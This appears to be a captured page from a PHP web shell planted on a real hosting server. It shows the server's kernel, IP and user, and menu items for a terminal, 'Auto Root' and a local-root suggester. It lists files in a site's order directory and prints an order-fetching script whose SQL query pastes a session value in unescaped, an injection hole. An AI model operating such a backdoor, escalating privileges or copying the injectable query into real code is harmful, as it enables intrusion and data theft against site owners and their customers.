Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.121
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
order /
list /
Delete
Unzip
Name
Size
Permission
Date
Action
wp
[ DIR ]
dr-xr-xr-x
2025-09-01 07:26
.htaccess
237
B
-r-xr-xr-x
2025-09-01 07:26
error_log
2.34
MB
-rw-r--r--
2025-08-20 14:18
fetch_data_for_bio.php
589
B
-rw-r--r--
2024-11-15 19:10
fetch_data_for_file.php
605
B
-rw-r--r--
2024-11-15 19:11
fetch_data_for_nid.php
563
B
-rw-r--r--
2024-11-15 19:33
fetch_data_for_sign.php
563
B
-rw-r--r--
2024-11-15 18:56
list_of_bio_order.php
710
B
-rw-r--r--
2024-11-15 18:52
list_of_file_order.php
820
B
-rw-r--r--
2024-11-15 19:13
list_of_nid_order.php
799
B
-rw-r--r--
2024-11-15 19:29
list_of_sign_order.php
801
B
-rw-r--r--
2024-11-15 19:22
Save
Rename
<?php session_start(); $email = base64_decode($_SESSION["user_id"]); header('Content-Type: application/json'); include_once("../../includes/configuration.php"); // Fetch data from the order_list table $sql = "SELECT order_type, nid, bio_totto, price, status, received, opinion, order_time, file_one FROM order_list WHERE email = '$email' AND user_type = 'file' AND order_type NOT IN ('sign_copy', 'NID PDF') ORDER BY id DESC"; // Assuming you're showing 'type' and 'nid' columns $result = $conn->query($sql); $orders = array(); if ($result->num_rows > 0) { // Fetch all rows into an array while ($row = $result->fetch_assoc()) { $orders[] = $row; } } // Return data as JSON echo json_encode($orders); // Close the connection $conn->close(); ?>